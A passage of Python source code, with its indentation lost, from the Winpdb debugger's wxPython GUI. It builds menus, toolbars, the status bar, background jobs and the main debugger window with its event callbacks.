# Windows.
#
tmpdir = tempfile.gettempdir()
path = os.path.join(tmpdir, WINPDB_SETTINGS_FILENAME)
return path
def load_settings(self):
try:
path = self.calc_path()
f = open(path, 'rb')
except IOError:
return
try:
d = pickle.load(f)
self.m_dict.update(d)
except:
rpdb2.print_debug_exception()
f.close()
def save_settings(self):
try:
path = self.calc_path()
f = open(path, 'wb')
except IOError:
return
try:
pickle.dump(self.m_dict, f)
finally:
f.close()
def __getitem__(self, key):
return self.m_dict[key]
def __setitem__(self, key, value):
self.m_dict[key] = value
class CMenuBar:
def __init__(self):
self.m_menubar = None
self.m_encapsulating_menu_items = {}
self.m_cascades = {}
def init_menubar(self, resource):
if 'wxMac' in wx.PlatformInfo:
wx.MenuBar.SetAutoWindowMenu(False)
self.m_menubar = wx.MenuBar()
self.m_cascades = {ML_ROOT: self.m_menubar}
k = resource.keys()
k.sort()
for c in k:
s = (ML_ROOT + c).split('/')
sc = [e for e in s if not e.isdigit()]
for i, e in enumerate(sc[:-1]):
if not e in self.m_cascades:
parent_label = sc[i - 1]
parent = self.m_cascades[parent_label]
child = wx.Menu()
if parent_label == ML_ROOT:
parent.Append(child, e)
else:
parent.AppendMenu(wx.NewId(), e, child)
self.m_encapsulating_menu_items[e] = parent
self.m_cascades[e] = child
parent_label = sc[-2]
parent = self.m_cascades[parent_label]
item_label = sc[-1]
if item_label == ML_EMPTY:
continue
if item_label == ML_SEPARATOR:
parent.AppendSeparator()
continue
command = resource[c][COMMAND]
tip = resource[c].get(TOOLTIP, wx.EmptyString)
item = parent.Append(-1, item_label, tip)
self.Bind(wx.EVT_MENU, command, item)
self.m_encapsulating_menu_items[item_label] = parent
#
# Must be done after menu is added to menu bar.
#
self.SetMenuBar(self.m_menubar)
if 'wxMac' in wx.PlatformInfo:
wx.GetApp().SetMacHelpMenuTitleName("&Help")
def set_menu_items_state(self, state_label_dict):
for state, label_list in state_label_dict.items():
for item_label in label_list:
parent = self.m_encapsulating_menu_items[item_label]
id = parent.FindItem(item_label)
parent.Enable(id, [True, False][state == DISABLED])
def add_menu_item(self, menu_label, item_label, command):
if not g_fUnicode:
item_label = rpdb2.as_string(item_label, wx.GetDefaultPyEncoding())
parent = self.m_cascades[menu_label]
item = parent.Append(-1, item_label)
self.Bind(wx.EVT_MENU, command, item)
def clear_menu_items(self, menu_label):
parent = self.m_cascades[menu_label]
while parent.GetMenuItemCount() > 0:
i = parent.FindItemByPosition(0)
parent.DeleteItem(i)
class CToolBar:
def __init__(self):
self.m_toolbar = None
self.m_items = {}
def init_toolbar(self, resource):
self.m_toolbar = self.CreateToolBar(wx.TB_HORIZONTAL | wx.NO_BORDER | wx.TB_FLAT | wx.TB_TEXT)
self.m_toolbar.SetToolBitmapSize(TOOLBAR_BITMAP_SIZE)
for e in resource:
item_label = e[LABEL]
if item_label == ML_SEPARATOR:
self.m_toolbar.AddSeparator()
continue
command = e[COMMAND]
id = wx.NewId()
if TEXT in e:
button = wx.Button(self.m_toolbar, id, e[TEXT], style = wx.NO_BORDER)
button.SetToolTipString(item_label)
self.m_toolbar.AddControl(button)
self.m_items[item_label] = {ID: id}
wx.EVT_BUTTON(self.m_toolbar, id, command)
continue
if DATA in e:
image = image_from_base64(e[DATA])
bitmap = wx.BitmapFromImage(image)
if DATA2 in e:
image2 = image_from_base64(e[DATA2])
bitmap2 = wx.BitmapFromImage(image2)
self.m_toolbar.AddSimpleTool(id, bitmap, item_label, isToggle = True)
self.m_items[item_label] = {ID: id, DATA: bitmap, DATA2: bitmap2}
self.Bind(wx.EVT_TOOL, command, id = id)
self.Bind(wx.EVT_TOOL, self.OnToggleTool, id = id)
else:
self.m_toolbar.AddSimpleTool(id, bitmap, item_label)
self.m_items[item_label] = {ID: id}
self.Bind(wx.EVT_TOOL, command, id = id)
self.m_toolbar.Realize()
def set_toolbar_item_text(self, label, text):
item = self.m_items[label]
id = item[ID]
tool = self.m_toolbar.FindControl(id)
tool.SetLabel(text)
size = tool.GetBestSize()
tool.SetSize(size)
def set_toolbar_items_state(self, state_label_dict):
for state, label_list in state_label_dict.items():
for label in label_list:
id = self.m_items[label][ID]
if (wx.Platform == '__WXGTK__') and (state == ENABLED):
self.__gtk_enable_tool(id)
else:
self.m_toolbar.EnableTool(id, [True, False][state == DISABLED])
def __gtk_enable_tool(self, id):
p = self.m_toolbar.ScreenToClient(wx.GetMousePosition())
(x, y) = self.m_toolbar.GetSize()
r = wx.RectS((x, y))
if r.Inside(p):
self.m_toolbar.WarpPointer(p.x, p.y + 2 * y)
self.m_toolbar.EnableTool(id, True)
if r.Inside(p):
self.m_toolbar.WarpPointer(p.x, p.y)
def set_toggle(self, label, fToggle):
item = self.m_items[label]
id = item[ID]
bitmap = [item[DATA], item[DATA2]][fToggle]
tool = self.m_toolbar.FindById(id)
tool.SetNormalBitmap(bitmap)
self.m_toolbar.ToggleTool(id, fToggle)
if wx.Platform == '__WXMSW__':
self.m_toolbar.Realize()
else:
self.m_toolbar.ToggleTool(id, not fToggle);
self.m_toolbar.ToggleTool(id, fToggle);
def OnToggleTool(self, event):
tool = self.m_toolbar.FindById(event.GetId())
if tool is None:
event.Skip()
return
label = tool.GetShortHelp()
f = event.IsChecked()
self.set_toggle(label, f)
event.Skip()
class CStatusBar:
def __init__(self):
self.m_statusbar = None
self.m_widths = []
self.m_formats = []
self.m_keys = []
self.m_data = {}
self.m_bitmaps = {}
self.sizeChanged = False
def init_statusbar(self, resource):
self.m_widths = [e[WIDTH] for e in resource]
self.m_formats = [e.get(FORMAT, "") for e in resource]
self.m_keys = [e.get(KEYS, []) for e in resource]
self.m_statusbar = self.CreateStatusBar(1, wx.ST_SIZEGRIP)
self.m_statusbar.SetFieldsCount(len(self.m_widths))
self.m_statusbar.SetStatusWidths(self.m_widths)
self.m_statusbar.Bind(wx.EVT_SIZE, self.OnSize)
self.m_statusbar.Bind(wx.EVT_IDLE, self.OnIdle)
def set_statusbar_data(self, data):
self.m_data.update(data)
for i, e in enumerate(self.m_keys):
for k in e:
if k in data:
if self.m_formats[i] == BITMAP:
self.set_bitmap(i, data[k][0], data[k][1])
else:
self.m_statusbar.SetStatusText(self.m_formats[i] % self.m_data, i)
break
def set_bitmap(self, i, data, tooltip):
if not i in self.m_bitmaps:
if data is None:
return
image = image_from_base64(data)
bitmap = wx.BitmapFromImage(image)
p = wx.Panel(self.m_statusbar)
sb = wx.StaticBitmap(p, -1, bitmap)
self.m_bitmaps[i] = (p, sb, tooltip)
else:
if data is None:
self.m_bitmaps[i][0].Hide()
else:
image = image_from_base64(data)
bitmap = wx.BitmapFromImage(image)
self.m_bitmaps[i][1].SetBitmap(bitmap)
self.m_bitmaps[i][0].Show()
self.reposition()
def reposition(self):
for i, (p, sb, tooltip) in self.m_bitmaps.items():
rect = self.m_statusbar.GetFieldRect(i)
p.SetPosition((rect.x + 2, rect.y + 2))
s = sb.GetSize()
sb.SetSize((s[0], rect.height - 4))
sb.SetToolTipString(tooltip)
p.SetToolTipString(tooltip)
p.SetClientSize(sb.GetSize())
self.sizeChanged = False
def OnSize(self, event):
self.reposition()
self.sizeChanged = True
def OnIdle(self, event):
if self.sizeChanged:
self.reposition()
class CJobs:
def __init__(self):
self.__m_jobs_lock = threading.RLock()
self.__m_n_expected_jobs = 0
self.__m_f_shutdown = False
def init_jobs(self):
pass
def shutdown_jobs(self):
self.__m_f_shutdown = True
while 1:
try:
self.__m_jobs_lock.acquire()
if self.__m_n_expected_jobs == 0:
return
finally:
self.__m_jobs_lock.release()
time.sleep(0.1)
def job_post(self, job, args, kwargs = {}, callback = None):
threading.Thread(target = self.job_do, args = (job, args, kwargs, callback)).start()
def job_do(self, job, args, kwargs, callback):
try:
self.__m_jobs_lock.acquire()
if self.__m_f_shutdown:
return
if self.__m_n_expected_jobs == 0:
wx.CallAfter(self.set_cursor, wx.CURSOR_WAIT)
self.__m_n_expected_jobs += 1
finally:
self.__m_jobs_lock.release()
r = None
exc_info = (None, None, None)
try:
r = job(*args, **kwargs)
except:
exc_info = sys.exc_info()
if callback == None:
rpdb2.print_debug_exception()
if callback is not None:
wx.CallAfter(callback, r, exc_info)
try:
self.__m_jobs_lock.acquire()
self.__m_n_expected_jobs -= 1
if self.__m_n_expected_jobs == 0:
wx.CallAfter(self.set_cursor, wx.CURSOR_ARROW)
finally:
self.__m_jobs_lock.release()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
class CMainWindow(CMenuBar, CToolBar, CStatusBar, CJobs):
def __init__(self):
CMenuBar.__init__(self)
CToolBar.__init__(self)
CStatusBar.__init__(self)
CJobs.__init__(self)
class CAsyncSessionManagerCall:
def __init__(self, session_manager, job_manager, f, callback, ftrace = False):
self.m_session_manager = session_manager
self.m_job_manager = job_manager
self.m_f = f
self.m_callback = callback
self.m_ftrace = ftrace
def __wrapper(self, *args, **kwargs):
if self.m_callback != None:
try:
if self.m_ftrace:
rpdb2.print_debug('Calling %s' % repr(self.m_f))
return self.m_f(*args, **kwargs)
finally:
if self.m_ftrace:
rpdb2.print_debug('Returned from %s' % repr(self.m_f))
try:
self.m_f(*args, **kwargs)
except rpdb2.FirewallBlock:
self.m_session_manager.report_exception(*sys.exc_info())
dlg = wx.MessageDialog(self.m_job_manager, rpdb2.STR_FIREWALL_BLOCK, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
except (socket.error, rpdb2.CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except rpdb2.CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
rpdb2.print_debug_exception(True)
def __call__(self, *args, **kwargs):
if self.m_job_manager == None:
return
self.m_job_manager.job_post(self.__wrapper, args, kwargs, self.m_callback)
class CAsyncSessionManager:
def __init__(self, session_manager, job_manager, callback = None, ftrace = False):
self.m_session_manager = session_manager
self.m_callback = callback
self.m_ftrace = ftrace
self.m_weakref_job_manager = None
if job_manager != None:
self.m_weakref_job_manager = weakref.ref(job_manager)
def with_callback(self, callback, ftrace = False):
if self.m_weakref_job_manager != None:
job_manager = self.m_weakref_job_manager()
else:
job_manager = None
asm = CAsyncSessionManager(self.m_session_manager, job_manager, callback, ftrace)
return asm
def __getattr__(self, name):
f = getattr(self.m_session_manager, name)
if not hasattr(f, '__call__'):
raise TypeError(repr(type(f)) + ' object is not callable')
if self.m_weakref_job_manager != None:
job_manager = self.m_weakref_job_manager()
else:
job_manager = None
return CAsyncSessionManagerCall(self.m_session_manager, job_manager, f, self.m_callback, self.m_ftrace)
class CWinpdbWindow(wx.Frame, CMainWindow):
def __init__(self, session_manager, settings):
CMainWindow.__init__(self)
wx.Frame.__init__(self, None, -1, WINPDB_TITLE, size = settings[WINPDB_SIZE],
style = wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)
#
# Force 'Left to Right' as long as internationalization is not supported.
# Not available on wxPython 2.6
#
if hasattr(self, 'SetLayoutDirection'):
self.SetLayoutDirection(1)
image = image_from_base64(BASE64_ICON_16)
bitmap = wx.BitmapFromImage(image)
icon16 = wx.EmptyIcon()
icon16.CopyFromBitmap(bitmap)
image = image_from_base64(BASE64_ICON_32)
bitmap = wx.BitmapFromImage(image)
icon32 = wx.EmptyIcon()
icon32.CopyFromBitmap(bitmap)
image = image_from_base64(BASE64_ICON_64)
bitmap = wx.BitmapFromImage(image)
icon64 = wx.EmptyIcon()
icon64.CopyFromBitmap(bitmap)
ibundle = wx.IconBundle()
ibundle.AddIcon(icon16)
ibundle.AddIcon(icon32)
ibundle.AddIcon(icon64)
self.SetIcons(ibundle)
self.Maximize(settings[WINPDB_MAXIMIZE])
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(session_manager, self)
self.m_source_manager = CSourceManager(self, session_manager)
self.m_settings = settings
self.m_stack = None
self.m_state = rpdb2.STATE_DETACHED
self.m_fembedded_warning = True
self.m_filter_level = 1
self.SetMinSize(WINPDB_SIZE_MIN)
self.SetSize(settings[WINPDB_SIZE])
self.Centre(wx.BOTH)
self.init_jobs()
menu_resource = {
"/0/" + ML_FILE + "/0/" + ML_PWD: {COMMAND: self.do_password, TOOLTIP: PWD_TIP},
"/0/" + ML_FILE + "/1/" + ML_LAUNCH: {COMMAND: self.do_launch, TOOLTIP: LAUNCH_TIP},
"/0/" + ML_FILE + "/2/" + ML_ATTACH: {COMMAND: self.do_attach, TOOLTIP: ATTACH_TIP},
"/0/" + ML_FILE + "/3/" + ML_OPEN: {COMMAND: self.do_open, TOOLTIP: OPEN_TIP},
"/0/" + ML_FILE + "/4/" + ML_DETACH: {COMMAND: self.do_detach, TOOLTIP: DETACH_TIP},
"/0/" + ML_FILE + "/5/" + ML_STOP: {COMMAND: self.do_stop, TOOLTIP: STOP_TIP},
"/0/" + ML_FILE + "/6/" + ML_RESTART: {COMMAND: self.do_restart, TOOLTIP: RESTART_TIP},
"/0/" + ML_FILE + "/7/" + ML_SEPARATOR: None,
"/0/" + ML_FILE + "/8/" + ML_EXIT: {COMMAND: self.do_exit},
"/1/" + ML_BREAKPOINTS + "/0/" + ML_TOGGLE: {COMMAND: self.toggle_breakpoint, TOOLTIP: TOGGLE_TIP},
"/1/" + ML_BREAKPOINTS + "/1/" + ML_DISABLE: {COMMAND: self.do_disable, TOOLTIP: DISABLE_TIP},
"/1/" + ML_BREAKPOINTS + "/2/" + ML_ENABLE: {COMMAND: self.do_enable, TOOLTIP: ENABLE_TIP},
"/1/" + ML_BREAKPOINTS + "/3/" + ML_CLEAR: {COMMAND: self.do_clear, TOOLTIP: CLEAR_TIP},
"/1/" + ML_BREAKPOINTS + "/4/" + ML_LOAD: {COMMAND: self.do_load, TOOLTIP: LOAD_TIP},
"/1/" + ML_BREAKPOINTS + "/5/" + ML_SAVE: {COMMAND: self.do_save, TOOLTIP: SAVE_TIP},
"/1/" + ML_BREAKPOINTS + "/6/" + ML_MORE: {COMMAND: self.do_more_bp, TOOLTIP: MORE_TIP},
"/2/" + ML_CONTROL + "/0/" + ML_ANALYZE: {COMMAND: self.do_analyze_menu, TOOLTIP: ANALYZE_TIP},
"/2/" + ML_CONTROL + "/1/" + ML_BREAK: {COMMAND: self.do_break, TOOLTIP: BREAK_TIP},
"/2/" + ML_CONTROL + "/2/" + ML_GO: {COMMAND: self.do_go, TOOLTIP: GO_TIP},
"/2/" + ML_CONTROL + "/3/" + ML_NEXT: {COMMAND: self.do_next, TOOLTIP: NEXT_TIP},
"/2/" + ML_CONTROL + "/4/" + ML_STEP: {COMMAND: self.do_step, TOOLTIP: STEP_TIP},
"/2/" + ML_CONTROL + "/5/" + ML_GOTO: {COMMAND: self.do_goto, TOOLTIP: GOTO_TIP},
"/2/" + ML_CONTROL + "/6/" + ML_RETURN: {COMMAND: self.do_return, TOOLTIP: RETURN_TIP},
"/2/" + ML_CONTROL + "/7/" + ML_JUMP: {COMMAND: self.do_jump, TOOLTIP: JUMP_TIP},
"/3/" + ML_WINDOW + "/0/" + ML_EMPTY: None,
"/4/" + ML_HELP + "/0/" + ML_WEBSITE: {COMMAND: self.do_website, TOOLTIP: WEBSITE_TIP},
"/4/" + ML_HELP + "/1/" + ML_SUPPORT: {COMMAND: self.do_support, TOOLTIP: SUPPORT_TIP},
"/4/" + ML_HELP + "/2/" + ML_DOCS: {COMMAND: self.do_docs, TOOLTIP: DOCS_TIP},
"/4/" + ML_HELP + "/3/" + ML_EXT_DOCS: {COMMAND: self.do_ext_docs, TOOLTIP: EXT_DOCS_TIP},
"/4/" + ML_HELP + "/4/" + ML_UPDATES: {COMMAND: self.do_updates, TOOLTIP: UPDATES_TIP},
"/4/" + ML_HELP + "/5/" + ML_ABOUT: {COMMAND: self.do_about},
"/4/" + ML_HELP + "/6/" + ML_LICENSE: {COMMAND: self.do_license}
}
self.init_menubar(menu_resource)
toolbar_resource = [
{LABEL: TB_BREAK, DATA: BASE64_BREAK, COMMAND: self.do_break},
{LABEL: TB_GO, DATA: BASE64_GO, COMMAND: self.do_go},
{LABEL: ML_SEPARATOR},
{LABEL: TB_NEXT, DATA: BASE64_NEXT, COMMAND: self.do_next},
{LABEL: TB_STEP, DATA: BASE64_STEP, COMMAND: self.do_step},
{LABEL: TB_GOTO, DATA: BASE64_GOTO, COMMAND: self.do_goto},
{LABEL: TB_RETURN, DATA: BASE64_RETURN, COMMAND: self.do_return},
{LABEL: ML_SEPARATOR},
{LABEL: TB_EXCEPTION, DATA: BASE64_EXCEPTION, DATA2: BASE64_EXCEPTION, COMMAND: self.do_analyze},
{LABEL: TB_TRAP, DATA: BASE64_TRAP, DATA2: BASE64_TRAP, COMMAND: self.do_trap},
{LABEL: ML_SEPARATOR},
{LABEL: TB_FILTER, TEXT: TB_FILTER_TEXT, COMMAND: self.do_filter},
{LABEL: ML_SEPARATOR},
{LABEL: TB_ENCODING, TEXT: TB_ENCODING_TEXT, COMMAND: self.do_encoding},
{LABEL: ML_SEPARATOR},
{LABEL: TB_SYNCHRONICITY, TEXT: TB_SYNCHRONICITY_TEXT, COMMAND: self.do_synchronicity}
]
self.init_toolbar(toolbar_resource)
self.set_toolbar_item_text(TB_FILTER, TB_FILTER_TEXT % FILTER_LEVELS[self.m_filter_level])
self.set_toolbar_item_text(TB_ENCODING, TB_ENCODING_TEXT % 'auto')
self.set_toolbar_item_text(TB_SYNCHRONICITY, TB_SYNCHRONICITY_TEXT % 'True')
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
self.set_toggle(TB_TRAP, ftrap)
statusbar_resource = [
{WIDTH: -2},
{WIDTH: -1, FORMAT: SB_STATE + ": %(" + SB_STATE + ")s", KEYS: [SB_STATE]},
{WIDTH: -1, FORMAT: SB_LINE + ": %(" + SB_LINE + ")d " + SB_COL + ": %(" + SB_COL + ")d", KEYS: [SB_LINE, SB_COL]},
{WIDTH: 50, FORMAT: BITMAP, KEYS: [SB_ENCRYPTION]}
]
self.init_statusbar(statusbar_resource)
self.m_splitterv = wx.SplitterWindow(self, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterv.SetMinimumPaneSize(100)
self.m_splitterv.SetSashGravity(0.5)
self.m_splitterh1 = wx.SplitterWindow(self.m_splitterv, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh1.SetMinimumPaneSize(70)
self.m_splitterh1.SetSashGravity(0.67)
self.m_splitterh2 = wx.SplitterWindow(self.m_splitterh1, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh2.SetMinimumPaneSize(70)
self.m_splitterh2.SetSashGravity(0.5)
self.m_namespace_viewer = CNamespaceViewer(self.m_splitterh2, style = wx.NO_BORDER, session_manager = self.m_session_manager)
self.m_namespace_viewer.set_filter(self.m_filter_level)
self.m_threads_viewer = CThreadsViewer(self.m_splitterh2, style = wx.NO_BORDER, select_command = self.OnThreadSelected)
self.m_stack_viewer = CStackViewer(self.m_splitterh1, style = wx.NO_BORDER, select_command = self.OnFrameSelected)
self.m_splitterh3 = wx.SplitterWindow(self.m_splitterv, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh3.SetMinimumPaneSize(100)
self.m_splitterh3.SetSashGravity(1.0)
self.m_code_viewer = CCodeViewer(self.m_splitterh3, style = wx.NO_BORDER | wx.TAB_TRAVERSAL, session_manager = self.m_session_manager, source_manager = self.m_source_manager, notify_filename = self.do_notify_filename)
self.m_console = CConsole(self.m_splitterh3, style = wx.NO_BORDER | wx.TAB_TRAVERSAL, session_manager = self.m_session_manager, exit_command = self.do_exit)
self.m_splitterh2.SplitHorizontally(self.m_namespace_viewer, self.m_threads_viewer)
self.m_splitterh1.SplitHorizontally(self.m_splitterh2, self.m_stack_viewer)
self.m_splitterv.SplitVertically(self.m_splitterh1, self.m_splitterh3)
self.m_splitterh3.SplitHorizontally(self.m_code_viewer, self.m_console)
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Bind(wx.EVT_SIZE, self.OnSizeWindow)
state = self.m_session_manager.get_state()
self.update_state(rpdb2.CEventState(state))
event_type_dict = {rpdb2.CEventState: {}}
self.m_session_manager.register_callback(self.update_state, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventStackFrameChange: {}}
self.m_session_manager.register_callback(self.update_frame, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventThreads: {}}
self.m_session_manager.register_callback(self.update_threads, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventNoThreads: {}}
self.m_session_manager.register_callback(self.update_no_threads, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventNamespace: {}}
self.m_session_manager.register_callback(self.update_namespace, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventUnhandledException: {}}
self.m_session_manager.register_callback(self.update_unhandled_exception, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventConflictingModules: {}}
self.m_session_manager.register_callback(self.update_conflicting_modules, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventThreadBroken: {}}
self.m_session_manager.register_callback(self.update_thread_broken, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventStack: {}}
self.m_session_manager.register_callback(self.update_stack, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventBreakpoint: {}}
self.m_session_manager.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventTrap: {}}
self.m_session_manager.register_callback(self.update_trap, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventEncoding: {}}
self.m_session_manager.register_callback(self.update_encoding, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventSynchronicity: {}}
self.m_session_manager.register_callback(self.update_synchronicity, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventClearSourceCache: {}}
self.m_session_manager.register_callback(self.update_source_cache, event_type_dict, fSingleUse = False)
wx.CallAfter(self.__init2)
def start(self, fchdir, command_line, fAttach):
self.m_console.start()
if fAttach:
self.m_async_sm.attach(command_line, encoding = rpdb2.detect_locale())
elif command_line != '':
self.m_async_sm.launch(fchdir, command_line, encoding = rpdb2.detect_locale())
#
#--------------------------------------------------
#
def __init2(self):
self.m_splitterh1.SetSashPosition(self.m_settings[SPLITTER_2_POS])
self.m_splitterh2.SetSashPosition(self.m_settings[SPLITTER_1_POS])
self.m_splitterv.SetSashPosition(self.m_settings[SPLITTER_3_POS])
self.m_splitterh3.SetSashPosition(self.m_settings[SPLITTER_4_POS])
self.CheckInterpreterConflict()
def CheckInterpreterConflict(self):
"""
On Windows, Winpdb can be started with a double click.
The Python interpreter is chosen according to extension binding.
With multiple Python installations it is possible that a winpdb
version installed on one Python installation will be launched with
the wrong python interpreter. This can lead to confusion and is
prevented with this code.
"""
if os.name != 'nt':
return
try:
path_m = sys.modules['__main__'].__file__.lower()
if not os.path.dirname(path_m)[1:] in [r':\python23\scripts', r':\python24\scripts', r':\python25\scripts']:
return
except:
return
path_e = sys.executable.lower()
if path_m[: 12] != path_e[: 12]:
dlg = wx.MessageDialog(self, PYTHON_WARNING_MSG % (path_m, path_e), PYTHON_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
#
#----------------- Thread list logic --------------
#
def OnThreadSelected(self, tid):
self.m_async_sm.set_thread(tid)
def update_threads(self, event):
wx.CallAfter(self.m_threads_viewer.update_threads_list, event.m_current_thread, event.m_thread_list)
def update_no_threads(self, event):
wx.CallAfter(self.clear_all)
def clear_all(self):
self.m_code_viewer._clear()
self.m_namespace_viewer._clear()
self.m_stack_viewer._clear()
self.m_threads_viewer._clear()
def update_thread_broken(self, event):
wx.CallAfter(self.m_threads_viewer.update_thread, event.m_tid, event.m_name, True)
#
#----------------------------------------------------
#
def update_bp(self, event):
wx.CallAfter(self.m_code_viewer.update_bp, event)
def toggle_breakpoint(self, event):
self.m_code_viewer.toggle_breakpoint()
#
#------------------- Frame Select Logic -------------
#
def OnFrameSelected(self, event):
self.m_async_sm.set_frame_index(event.m_itemIndex)
def update_frame(self, event):
wx.CallAfter(self.do_update_frame, event.m_frame_index)
def do_update_frame(self, index):
self.do_set_position(index)
self.m_stack_viewer.select_frame(index)
#
#----------------------------------------------------------
#
def update_stack(self, event):
self.m_stack = event.m_stack
wx.CallAfter(self.do_update_stack, event.m_stack)
def do_update_stack(self, _stack):
self.m_stack = _stack
self.m_stack_viewer.update_stack_list(self.m_stack)
index = self.m_session_manager.get_frame_index()
self.do_update_frame(index)
def do_set_position(self, index):
s = self.m_stack[rpdb2.DICT_KEY_STACK]
e = s[-(1 + index)]
filename = e[0]
lineno = e[1]
fBroken = self.m_stack[rpdb2.DICT_KEY_BROKEN]
_event = self.m_stack[rpdb2.DICT_KEY_EVENT]
__event = ['running', ['call', _event][index == 0]][fBroken]
self.m_code_viewer.set_position(filename, lineno, __event)
#
#----------------------------------------------------
#
def do_encoding(self, event):
encoding, fraw = self.m_session_manager.get_encoding()
dlg = CEncodingDialog(self, encoding, fraw)
r = dlg.ShowModal()
if r == wx.ID_OK:
encoding, fraw = dlg.get_encoding()
self.m_session_manager.set_encoding(encoding, fraw)
dlg.Destroy()
def do_synchronicity(self, event):
fsynchronicity = self.m_session_manager.get_synchronicity()
dlg = CSynchronicityDialog(self, fsynchronicity)
r = dlg.ShowModal()
if r == wx.ID_OK:
fsynchronicity = dlg.get_synchronicity()
self.m_session_manager.set_synchronicity(fsynchronicity)
dlg.Destroy()
def do_analyze_menu(self, event):
state = self.m_session_manager.get_state()
f = (state != rpdb2.STATE_ANALYZE)
self.m_async_sm.set_analyze(f)
def do_analyze(self, event):
f = event.IsChecked()
self.m_async_sm.set_analyze(f)
def update_trap(self, event):
wx.CallAfter(self.set_toggle, TB_TRAP, event.m_ftrap)
def do_trap(self, event):
f = event.IsChecked()
if not f:
dlg = wx.MessageDialog(self, MSG_WARNING_TRAP, MSG_WARNING_TITLE, wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_NO:
self.set_toggle(TB_TRAP, True)
return
self.m_async_sm.set_trap_unhandled_exceptions(f)
def update_namespace(self, event):
wx.CallAfter(self.m_namespace_viewer.update_namespace, self.m_stack)
def update_unhandled_exception(self, event):
wx.CallAfter(self.notify_unhandled_exception)
def notify_unhandled_exception(self):
dlg = wx.MessageDialog(self, MSG_WARNING_UNHANDLED_EXCEPTION, MSG_WARNING_TITLE, wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
res = dlg.ShowModal()
dlg.Destroy()
if res != wx.ID_YES:
return
self.m_async_sm.set_analyze(True)
def update_conflicting_modules(self, event):
wx.CallAfter(self.notify_conflicting_modules, event)
def notify_conflicting_modules(self, event):
s = ', '.join(event.m_modules_list)
if not g_fUnicode:
s = rpdb2.as_string(s, wx.GetDefaultPyEncoding())
dlg = wx.MessageDialog(self, rpdb2.STR_CONFLICTING_MODULES % s, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
def do_filter(self, event):
self.m_filter_level = (self.m_filter_level + 1) % 3
self.set_toolbar_item_text(TB_FILTER, TB_FILTER_TEXT % FILTER_LEVELS[self.m_filter_level])
self.m_namespace_viewer.set_filter(self.m_filter_level)
self.m_namespace_viewer.update_namespace(self.m_stack)
def do_notify_filename(self, filename, command):
if command is not None:
self.add_menu_item(ML_WINDOW, filename, command)
self.m_console.set_filename(filename)
def OnSizeWindow(self, event):
if not self.IsMaximized():
#
# On a Mac, the size is magically increased by 47; decrease it back.
#
(w, h) = self.GetSize()
if sys.platform == 'darwin':
h -= 47
self.m_settings[WINPDB_SIZE] = (w, h)
event.Skip()
def OnCloseWindow(self, event):
if event.CanVeto() and self.m_session_manager.get_state() != rpdb2.STATE_DETACHED:
dlg = wx.MessageDialog(self, STR_EXIT_WARNING, MSG_WARNING_TITLE, wx.YES_NO | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
event.Veto()
return
if res == wx.ID_NO:
f = lambda r, exc_info: self.Close()
self.m_async_sm.with_callback(f).detach()
event.Veto()
return
try:
self.m_session_manager.stop_debuggee()
except:
pass
self.m_settings[WINPDB_MAXIMIZE] = self.IsMaximized()
self.m_settings[SPLITTER_1_POS] = self.m_splitterh2.GetSashPosition()
self.m_settings[SPLITTER_2_POS] = self.m_splitterh1.GetSashPosition()
self.m_settings[SPLITTER_3_POS] = self.m_splitterv.GetSashPosition()
self.m_settings[SPLITTER_4_POS] = self.m_splitterh3.GetSashPosition()
self.m_console.stop()
self.shutdown_jobs()
self.Destroy()
event.Skip()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_code_viewer.set_cursor(id)
self.m_threads_viewer.set_cursor(id)
self.m_stack_viewer.set_cursor(id)
def do_none(self, event):
pass
def update_source_cache(self, event):
wx.CallAfter(self.callback_source_cache, event)
def callback_source_cache(self, event):
self.m_source_manager.mark_files_dirty()
self.m_code_viewer.refresh()
def update_encoding(self, event):
wx.CallAfter(self.callback_encoding, event)
def callback_encoding(self, event):
encoding, fraw = self.m_session_manager.get_encoding()
if encoding != rpdb2.ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
if fraw:
encoding += ', ' + rpdb2.ENCODING_RAW
self.set_toolbar_item_text(TB_ENCODING, TB_ENCODING_TEXT % encoding)
def update_synchronicity(self, event):
wx.CallAfter(self.callback_synchronicity, event)
def callback_synchronicity(self, event):
